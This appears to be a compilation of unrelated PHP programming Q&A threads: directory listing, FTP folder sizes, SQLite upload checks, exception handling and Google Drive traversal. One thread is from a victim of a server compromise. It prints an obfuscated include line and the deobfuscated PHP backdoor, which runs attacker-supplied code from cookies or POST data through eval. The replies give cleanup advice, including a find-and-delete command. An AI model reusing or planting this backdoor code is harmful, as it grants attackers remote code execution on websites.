I need to do a list of all files on a server from an other server.
I don't have access to PHP config like maximum timeout of the remote server.
The maximum timeout could be very short like 30s. In some case, the following code gives a Timeout issue, because the iterator don't have enough time to get all the files.
public function getStructure($path)
{
$structure = new \stdClass();
$structure->dirs = array();
$structure->files = array();
$iterator = new \RecursiveIteratorIterator(
new \RecursiveDirectoryIterator($path), \RecursiveIteratorIterator::SELF_FIRST);
foreach ($iterator as $file)
{
if ($file->isDir())
{
$structure->dirs[] = $file->getRealpath();
}
else
{
$structure->files[] = $file->getRealpath();
}
}
return $structure;
}
I'm looking for a way to get the structure in multiple calls. Something like : myremotesite.com/api/v1/structrue?start=xxxx where start is the point where the last call stop.
Thanks for your help
sounds like you need a dir with save/resume functionality... i would probably implement it in SQLite, due to its synchronous-by-default nature.
since i was bored.. UNTESTED, but should work in theory. DO NOT try to implement beginTransaction() / commit() optimizations to this code, that would defeat the whole "synchronous and tolerates crashing at any moment" part of the code;
<?php
//will return bool(true) when it's finished creating the database.
//should be timeout/unstable system resistant,
//relying on SQLite's syncronous-by-default nature.
function dirToSQLite($dir,$sqldb){
if(!is_readable($dir)){
throw new InvalidArgumentException('argument 1 must be a readable dir, but is not readable.');
}
if(!is_dir($dir)){
throw new InvalidArgumentException('argument 1 is not a valid dir');
}
$db=new PDO('sqlite:'.$sqldb,'','',array(PDO::ATTR_EMULATE_PREPARES => false,PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION));
$db->exec('CREATE TABLE IF NOT EXISTS `dir` (`id` INTEGER PRIMARY KEY,`path` TEXT UNIQUE,`type` TEXT);');
$db->query('INSERT OR IGNORE INTO `dir` (`path`,`type`) VALUES('.$db->quote($dir).',\'dirUnexplored\');');
$stm=$db->prepare('INSERT INTO `dir` (`path`,`type`) VALUES(:path,:type);');
$stmExplored=$db->prepare('UPDATE `dir` SET `type` = \'dir\' WHERE id = ? ');
$path='';
$type='';
$stm->bindParam(':path',$path,PDO::PARAM_STR);
$stm->bindParam(':type',$type,PDO::PARAM_STR);
while(true){
$found=false;
foreach($db->query('SELECT `id`,`path` FROM `dir` WHERE `type` = \'dirUnexplored\'') as $res)
{
$found=true;
$di=new DirectoryIterator($res['path']);
foreach($di as $file){
if($file->isDot()){
continue;
} else
if($file->isLink()){
$type='link';
} else
if($file->isDir()){
$type='dirUnexplored';
} else
if($file->isFile()){
$type='file';
} else
{
$type='unknown';
}
$path=$file->getPathname();
$stm->execute();
}
$stmExplored->execute(array($res['id']));
}
if(!$found){
break;
}
}
return true;
}
if(true===dirToSqlite('/home/foo','homefoo.db3')){
echo "finished!";
}else {
throw new Exception();
}
then just keep calling that url until it returns the string "finished!", then you can download the SQLite database directly, no php involved in the download.
Related
I have a number of different hosting accounts set up for clients and need to calculate the amount of storage space being used on each account, which would update regularly.
I have a database set up to record each clients storage usage.
I attempted this first using a PHP file on each account, run by a Cron Job. If run manually by myself, it would output the correct filesize and update the correct size to the database, although when run from the Cron Job, it would output 0.
I then attempted to run this file from a Cron Job from the main account but figured this wouldn't actually work as my hosting would block files from another server and I would end up with the same result as before.
I am now playing around with FTP access to each account from a Cron Job from the main account which looks something like below, the only problem is I don't know how to calculate directory size rather than single file sizes using FTP access, and don't know how to reiterate this way? Hoping somebody might be able to help here before I end up going around in circles?
I will also add the previous first attempt too.
$ftp_conn = ftp_connect($ftp_host, 21, 420) or die("Could not connect to server");
$ftp_login = ftp_login($ftp_conn, $ftp_username, 'mypassword');
$total_size = 0;
$contents = ftp_nlist($ftp_conn, ".");
// output $contents
foreach($contents as $folder){
while($search == true){
if($folder == '..' || $folder == '.'){
} else {
$file = $folder;
$res = ftp_size($ftp_conn, $file);
if ($res != -1) {
$total_size = $total_size + $res;
} else {
$total_size = $total_size;
}
}
}
}
ftp_close($ftp_conn);
This doesn't work as it doesn't calculate folder sizes and I don't know how to open the reiterate using this method?
This second script did work but would only work if opened manually, and return 0 if run by the cron job.
class Directory_Calculator {
function calculate_whole_directory($directory)
{
if ($handle = opendir($directory))
{
$size = 0;
$folders = 0;
$files = 0;
while (false !== ($file = readdir($handle)))
{
if ($file != "." && $file != "..")
{
if(is_dir($directory.$file))
{
$array = $this->calculate_whole_directory($directory.$file.'/');
$size += $array['size'];
$files += $array['files'];
$folders += $array['folders'];
}
else
{
$size += filesize($directory.$file);
$files++;
}
}
}
closedir($handle);
}
$folders++;
return array('size' => $size, 'files' => $files, 'folders' => $folders);
}
}
/* Path to Directory - IMPORTANT: with '/' at the end */
$directory = '../public_html/';
// return an array with: size, total files & folders
$array = $directory_size->size($directory);
$size_of_site = $array['size'];
echo $size_of_site;
Please bare in mind that I am currently testing and none of the MySQLi or PHP scripts are secure yet.
If your server supports MLSD command and you have PHP 7.2 or newer, you can use ftp_mlsd function:
function calculate_whole_directory($ftp_conn, $directory)
{
$files = ftp_mlsd($ftp_conn, $directory) or die("Cannot list $directory");
$result = 0;
foreach ($files as $file)
{
if (($file["type"] == "cdir") || ($file["type"] == "pdir"))
{
$size = 0;
}
else if ($file["type"] == "dir")
{
$size = calculate_whole_directory($ftp_conn, $directory."/".$file["name"]);
}
else
{
$size = intval($file["size"]);
}
$result += $size;
}
return $result;
}
If you do not have PHP 7.2, you can try to implement the MLSD command on your own. For a start, see user comment of the ftp_rawlist command:
https://www.php.net/manual/en/function.ftp-rawlist.php#101071
If you cannot use MLSD, you will particularly have problems telling if an entry is a file or folder. While you can use the ftp_size trick, as you do, calling ftp_size for each entry can take ages.
But if you need to work against one specific FTP server only, you can use ftp_rawlist to retrieve a file listing in a platform-specific format and parse that.
The following code assumes a common *nix format.
function calculate_whole_directory($ftp_conn, $directory)
{
$lines = ftp_rawlist($ftp_conn, $directory) or die("Cannot list $directory");
$result = 0;
foreach ($lines as $line)
{
$tokens = preg_split("/\s+/", $line, 9);
$name = $tokens[8];
if ($tokens[0][0] === 'd')
{
$size = calculate_whole_directory($ftp_conn, "$directory/$name");
}
else
{
$size = intval($tokens[4]);
}
$result += $size;
}
return $result;
}
Based on PHP FTP recursive directory listing.
Regarding cron: I'd guess that the cron does not start your script with a correct working directory, so you calculate a size of a non-existing directory.
Use an absolute path here:
$directory = '../public_html/';
Though you better add some error checking so that you can see yourself what goes wrong.
What I want to do is a small web page that a user can upload a SQLite file, but I want to avoid those uploads that aren't SQLite format, so I try to verify it before I execute "move_uploaded_file". Above there's an example of what I've tried to do, but it doesn't work.
function isFileOkay($filedir) {
try
{
$db = new PDO("sqlite:".$filedir);
$sql = "PRAGMA schema_version;";
$ret = $db->query($sql);
if(!$ret)
{
$db = NULL;
return -1;
}
$row = $ret->fetchAll(PDO::FETCH_BOTH);
$value = (int) $row[0]['schema_version'];
$db = NULL;
return $value;
}
catch (PDOException $exception) {
echo $exception->getMessage();
return -1;
}
}
...
$test = isFileOkay($_FILES['upload_file']['tmp_name']);
...
The $test variable should be "-1" if the file isn't a SQLite file, or $value. $value = 0 also indicates that the file is not okay, but any value greater than 0 indicates that it is a valid SQLite file.
The point is that when I test this code manually inserting a path for $filedir, e.g a file already existing in this machine, the output is correct. But when I try to verify "$_FILES['upload_file']['tmp_name']" it doesn't work, and the page crashes.
I am new at web programming, especially in PHP, so I think there might be a misunderstanding about the $_FILE variable.
You should be able to check the mime type of the uploaded file:
$finfo = new finfo(FILEINFO_MIME_TYPE);
$mime = $finfo->file($_FILES['upload_file']['tmp_name']);
// SQLite is application/x-sqlite3
if ($mime == 'application/x-sqlite3') {
// Is SQLite
} else {
// Is something else
}
I have three websites all hosted on the same webserver. Recently I was working on one of the websites and noticed that, about a month ago, a bunch of files had been changed. Specifically, all instances of index.html had been renamed to index.html.bak.bak, and index.php files have been put in their places. The index.php files are relatively simple; they include a file hidden somewhere in each website's filesystem (seemingly a random folder) that's been obfuscated with JS hex encoding, then echo the original index.html:
<?php
/*2d4f2*/
#include "\x2fm\x6et\x2fs\x74o\x721\x2dw\x631\x2dd\x66w\x31/\x338\x304\x323\x2f4\x365\x380\x39/\x77w\x77.\x77e\x62s\x69t\x65.\x63o\x6d/\x77e\x62/\x63o\x6et\x65n\x74/\x77p\x2di\x6ec\x6cu\x64e\x73/\x6as\x2fs\x77f\x75p\x6co\x61d\x2ff\x61v\x69c\x6fn\x5f2\x391\x337\x32.\x69c\x6f";
/*2d4f2*/
echo file_get_contents('index.html.bak.bak');
The included file here was
/mnt/*snip*/www.website.com/web/content/wp-includes/js/swfupload/favicon_291372.ico
On another domain, it was
/mnt/*snip*/www.website2.com/web/content/wiki/maintenance/hiphop/favicon_249bed.ico
As you could probably guess, these aren't actually favicons - they're just php files with a different extension. Now, I have no clue what these files do (which is why I'm asking here). They were totally obfuscated, but https://malwaredecoder.com/ seems to be able to crack through it. The results can be found here, but I've pasted the de-obfuscated code below:
#ini_set('error_log', NULL);
#ini_set('log_errors', 0);
#ini_set('max_execution_time', 0);
#error_reporting(0);
#set_time_limit(0);
if(!defined("PHP_EOL"))
{
define("PHP_EOL", "\n");
}
if(!defined("DIRECTORY_SEPARATOR"))
{
define("DIRECTORY_SEPARATOR", "/");
}
if (!defined('ALREADY_RUN_144c87cf623ba82aafi68riab16atio18'))
{
define('ALREADY_RUN_144c87cf623ba82aafi68riab16atio18', 1);
$data = NULL;
$data_key = NULL;
$GLOBALS['cs_auth'] = '8debdf89-dfb8-4968-8667-04713f279109';
global $cs_auth;
if (!function_exists('file_put_contents'))
{
function file_put_contents($n, $d, $flag = False)
{
$mode = $flag == 8 ? 'a' : 'w';
$f = #fopen($n, $mode);
if ($f === False)
{
return 0;
}
else
{
if (is_array($d)) $d = implode($d);
$bytes_written = fwrite($f, $d);
fclose($f);
return $bytes_written;
}
}
}
if (!function_exists('file_get_contents'))
{
function file_get_contents($filename)
{
$fhandle = fopen($filename, "r");
$fcontents = fread($fhandle, filesize($filename));
fclose($fhandle);
return $fcontents;
}
}
function cs_get_current_filepath()
{
return trim(preg_replace("/\(.*\$/", '', __FILE__));
}
function cs_decrypt_phase($data, $key)
{
$out_data = "";
for ($i=0; $i<strlen($data);)
{
for ($j=0; $j<strlen($key) && $i<strlen($data); $j++, $i++)
{
$out_data .= chr(ord($data[$i]) ^ ord($key[$j]));
}
}
return $out_data;
}
function cs_decrypt($data, $key)
{
global $cs_auth;
return cs_decrypt_phase(cs_decrypt_phase($data, $key), $cs_auth);
}
function cs_encrypt($data, $key)
{
global $cs_auth;
return cs_decrypt_phase(cs_decrypt_phase($data, $cs_auth), $key);
}
function cs_get_plugin_config()
{
$self_content = #file_get_contents(cs_get_current_filepath());
$config_pos = strpos($self_content, md5(cs_get_current_filepath()));
if ($config_pos !== FALSE)
{
$config = substr($self_content, $config_pos + 32);
$plugins = #unserialize(cs_decrypt(base64_decode($config), md5(cs_get_current_filepath())));
}
else
{
$plugins = Array();
}
return $plugins;
}
function cs_set_plugin_config($plugins)
{
$config_enc = base64_encode(cs_encrypt(#serialize($plugins), md5(cs_get_current_filepath())));
$self_content = #file_get_contents(cs_get_current_filepath());
$config_pos = strpos($self_content, md5(cs_get_current_filepath()));
if ($config_pos !== FALSE)
{
$config_old = substr($self_content, $config_pos + 32);
$self_content = str_replace($config_old, $config_enc, $self_content);
}
else
{
$self_content = $self_content . "\n\n//" . md5(cs_get_current_filepath()) . $config_enc;
}
#file_put_contents(cs_get_current_filepath(), $self_content);
}
function cs_plugin_add($name, $base64_data)
{
$plugins = cs_get_plugin_config();
$plugins[$name] = base64_decode($base64_data);
cs_set_plugin_config($plugins);
}
function cs_plugin_rem($name)
{
$plugins = cs_get_plugin_config();
unset($plugins[$name]);
cs_set_plugin_config($plugins);
}
function cs_plugin_load($name=NULL)
{
foreach (cs_get_plugin_config() as $pname=>$pcontent)
{
if ($name)
{
if (strcmp($name, $pname) == 0)
{
eval($pcontent);
break;
}
}
else
{
eval($pcontent);
}
}
}
foreach ($_COOKIE as $key=>$value)
{
$data = $value;
$data_key = $key;
}
if (!$data)
{
foreach ($_POST as $key=>$value)
{
$data = $value;
$data_key = $key;
}
}
$data = #unserialize(cs_decrypt(base64_decode($data), $data_key));
if (isset($data['ak']) && $cs_auth==$data['ak'])
{
if ($data['a'] == 'i')
{
$i = Array(
'pv' => #phpversion(),
'sv' => '2.0-1',
'ak' => $data['ak'],
);
echo #serialize($i);
exit;
}
elseif ($data['a'] == 'e')
{
eval($data['d']);
}
elseif ($data['a'] == 'plugin')
{
if($data['sa'] == 'add')
{
cs_plugin_add($data['p'], $data['d']);
}
elseif($data['sa'] == 'rem')
{
cs_plugin_rem($data['p']);
}
}
echo $data['ak'];
}
cs_plugin_load();
}
In addition, there is a file called init5.php in one of the website's content folders, which after deobfuscating as much as possible, becomes:
$GLOBALS['893\Gt3$3'] = $_POST;
$GLOBALS['S9]<\<\$'] = $_COOKIE;
#>P>r"$,('$66N6rTNj', NULL);
#>P>r"$,('TNjr$66N6"', 0);
#>P>r"$,('k3'r$'$9#,>NPr,>k$', 0);
#"$,r,>k$rT>k>,(0);
$w6f96424 = NULL;
$s02c4f38 = NULL;
global $y10a790;
function a31f0($w6f96424, $afb8d)
{
$p98c0e = "";
for ($r035e7=0; $r035e7<",6T$P($w6f96424);)
{
for ($l545=0; $l545<",6T$P($afb8d) && $r035e7<",6T$P($w6f96424); $l545++, $r035e7++)
{
$p98c0e .= 9)6(N6`($w6f96424[$r035e7]) ^ N6`($afb8d[$l545]));
}
}
return $p98c0e;
}
function la30956($w6f96424, $afb8d)
{
global $y10a790;
return 3\x9<(3\x9<($w6f96424, $y10a790), $afb8d);
}
foreach ($GLOBALS['S9]<\<\$'] as $afb8d=>$ua56c9d)
{
$w6f96424 = $ua56c9d;
$s02c4f38 = $afb8d;
}
if (!$w6f96424)
{
foreach ($GLOBALS['893\Gt3$3'] as $afb8d=>$ua56c9d)
{
$w6f96424 = $ua56c9d;
$s02c4f38 = $afb8d;
}
}
$w6f96424 = ##P"$6>3T>a$(T3\<]tO(R3"$OIr`$9N`$($w6f96424), $s02c4f38));
if (isset($w6f96424['38']) && $y10a790==$w6f96424['38'])
{
if ($w6f96424['3'] == '>')
{
$r035e7 = Array(
'#=' => ##)#=$6">NP(),
'"=' => 'x%<Fx',
);
echo #"$6>3T>a$($r035e7);
}
elseif ($w6f96424['3'] == '$')
{
eval($w6f96424['`']);
}
}
There are more obfuscated PHP files the more I look, which is kinda scary. There's tons of them. Even Wordpress' index.php files seem to have been infected; the obfuscated #includes have been added to them. In addition, on one of the websites, there's a file titled 'ssh' that seems to be some kind of binary file (maybe the 'ssh' program itself?)
Does anyone know what these are or do? How did they get on my server? How can I get rid of them and make sure they never comes back?
Some other info: my webhost is Laughing Squid; I have no shell access. The server runs Linux, Apache 2.4, and PHP 5.6.29. Thank you!
You can't trust anything on the server at this point.
Reinstall the OS
Reinstall known good copies of your code with a clean or known-good version of the database.
At this point there's no use in just replacing/deleting "bad" files because the attacker could have done absolutely anything ranging from "nothing" to replacing system level software with hacked versions that will do anything desired. Just for an example, at one point someone wrote malware into a compiler so even if the executable was rebuilt, the maware was still there, also it prevented the debugger from detecting it.
There are various cleaners available, but they rely on knowing/detecting/undoing everything the attacker might have done, which is impossible.
If you had good daily backups, you could do a diff between the "what you have" and "what you had before" and see what has changed, however you would still need to carefully examine or restore your database since many attacks involve changing data, not code.
This is not a hack you need to trash your sites and server over. It is just a php hack. Get rid of all of the malicious php files and code and you'll be good. Here is how I did it on drupal. http://rankinstudio.com/Drupal_ico_index_hack
I had this same malware. There are 10 to 15 files the malware adds or modifies. I used the Quttera WordPress plug-in(free) to find the files. Most of the files can just be deleted (Be careful, Quttera ids more than are actually infected) but some WordPress files were modified and must be replaced.
Had to write myself one PHP script to scan the whole server tree, listing all directory paths, and one to scan those paths for infections. Can only partly clean, but provides much needed help with the pedestrian cleanup.
NOTE:
It's poorly written, and probably should be removed after use. But it helped me.
A zipped copy is here.
No guarantees; unzip it and take a look what you put on your server, before uploading it!
Update: Now cleans more (not all!). Follow up with hand-cleaning (see below).
I had the same problem.
It is caused by malicious http post requests.
Here is a good article about how to stop it:
The following in a .htaccess file will stop all post requests.
https://perishablepress.com/protect-post-requests/
# deny all POST requests
<IfModule mod_rewrite.c>
RewriteCond %{REQUEST_METHOD} POST
RewriteRule .* - [F,L]
</IfModule>
I haven't found yet, how to prevent these files from appearing on my server, yet i'm able to get rid of them, here's a oneliner crawling down the folders and removing them:
find . -type f -name 'favicon_*.ico' -delete -print
Below is the code that throws some errors while getting executed. What I'm trying to do is the last line of the code gets executed no matter what (Error or no Error).
<?php
require 'main.php';
function create_photo($file_path) {
# Upload the received image file to Cloudinary
#$result = \Cloudinary\Uploader::upload($file_path, array(
"tags" => "backend_photo_album",
));
#unlink($file_path);
error_log("Upload result: " . \PhotoAlbum\ret_var_dump($result));
$photo = \PhotoAlbum\create_photo_model($result);
return $result;
}
$files = $_FILES["files"];
$files = is_array($files) ? $files : array($files);
$files_data = array();
foreach ($files["tmp_name"] as $index => $value) {
array_push($files_data, create_photo($value));
}
?>
<script>window.location.replace('index.html')</script>
Any help would be much appreciated. Thanks
I think depending on your php version, you can use a "try/catch/finally" bloc like that:
try
{
// code that may throw an exception
}
catch(Exeption $e) // The exception you want to catch
{
// Exception treatment
}
finally
{
// Executed no matter what
}
Maybe take a look about how to use that.
How to get basic info (id, title, mime-type at least) for each file and folder in subtree of given folder with as few API-calls as possible? ie. not to call api to download details for every subfolder?
I found the workaround to read all files with some non-hierarchical-characteristic (eg. owner) and to build tree-structure in client script. My files are unfortunately all from one owner (application), so I cannot do it this way.
ok, here is the example code for the recursion-multiple-api-calls way, which can be enough for some use cases. But I would like to find better concept (not to discuss this implementation, but another way, how to not call the API for each folder):
class Foo {
const FOLDER_MIME_TYPE = 'application/vnd.google-apps.folder';
public function getSubtreeForFolder($parentId, $sort=true)
{
$service = $this->createCrmGService();
// A. folder info
$file = $service->files->get($parentId);
$ret = array(
'id' => $parentId,
'name' => $file->getTitle(),
'description' => $file->getDescription(),
'mimetype' => $file->getMimeType(),
'is_folder' => true,
'children' => array(),
'node' => $file,
);
if ($ret['mimetype'] != self::FOLDER_MIME_TYPE) {
throw new Exception(_t("{$ret['name']} is not a folder."));
}
$items = $this->findAllFiles($queryString='trashed = false', $parentId, $fieldsFilter='items(alternateLink,description,fileSize,id,mimeType,title)', $service);
foreach ($items as $child)
{
if ($this->isFolder($child))
{
$ret['children'][] = $this->getSubtreeForFolder($child->id, $sort);
}
else
{
// B. file info
$a['id'] = $child->id;
$a['name'] = $child->title;
$a['description'] = $child->description;
$a['is_folder'] = false;
$a['url'] = $file->getDownloadUrl();
$a['url_detail'] = $child->getAlternateLink();
$a['versionLabel'] = false; //FIXME
$a['node'] = $child;
if (!$a['versionLabel']) {
$a['versionLabel'] = '1.0'; //old files compatibility hack
}
$ret['children'][] = $a;
}
}
if ($sort && isset($ret['children']))
{
if ($sort === true) {
$sort = create_function('$a, $b', 'if ($a[\'name\'] == $b[\'name\']) return 0; return strcasecmp($a[\'name\'], $b[\'name\']);');
}
usort($ret['children'], $sort);
}
return $ret;
}
public function findAllFiles($queryString, $parentId=false, $fieldsFilter='items(id,title)', $service = false)
{
if (!$service) $service = $this->createCrmGService();
$result = array();
$pageToken = NULL;
if ($parentId) {
$queryString .= ($queryString ? ' AND ' : '') . "'{$parentId}' in parents";
}
do {
try {
$parameters = array('q' => $queryString);
if ($fieldsFilter) $parameters['fields'] = $fieldsFilter;
if ($pageToken) {
$parameters['pageToken'] = $pageToken;
}
$files = $service->files->listFiles($parameters);
$result = array_merge($result, $files->getItems());
$pageToken = $files->getNextPageToken();
} catch (Exception $e) {
print "An error occurred: " . $e->getMessage();
$pageToken = NULL;
}
} while ($pageToken);
return $result;
}
/**
* #param Google_DriveFile $file
* #return boolean, jestli je $file slozka.
*/
protected function isFolder($file)
{
return $file->getMimeType() == self::FOLDER_MIME_TYPE;
}
}
First, I would suggest you not to get all files and folders. It takes too much time for some users who have many files uploaded on their Drive. Also, there is query limit in your application key. In fact, many applications who have custom file picker make queries each time user requests subfolder.
Second, if this is webapp, it would be better idea to use Google Picker. Google Picker is way much faster and more efficient to pick files from Drive. There are many options and filters and you have decent control over files.
Third, you cannot fully represent Drive's files and folders in tree structure. As you can see in queries, each file have parents, which means there can be more than one parent for each file/folder. You need to think of some workarounds like choosing only one of the parents for each file.
If you still want to get all file/folder information, in terms of performance, the best implementation would be recursively calling Children.list(). FYI, file id 'root' is reserved id you can easily start with. And once you get id's of children, you can make batch query of Files.get() with multipart. This is the fastest way to traverse through file system of Google Drive afaik.
Again, unless you have very good reason, please do not try to traverse through all files in Drive at once. There are some users who have a lot of files in their Drive and you will make them wait forever no matter how great optimization you made. Also, you will easily hit query limit.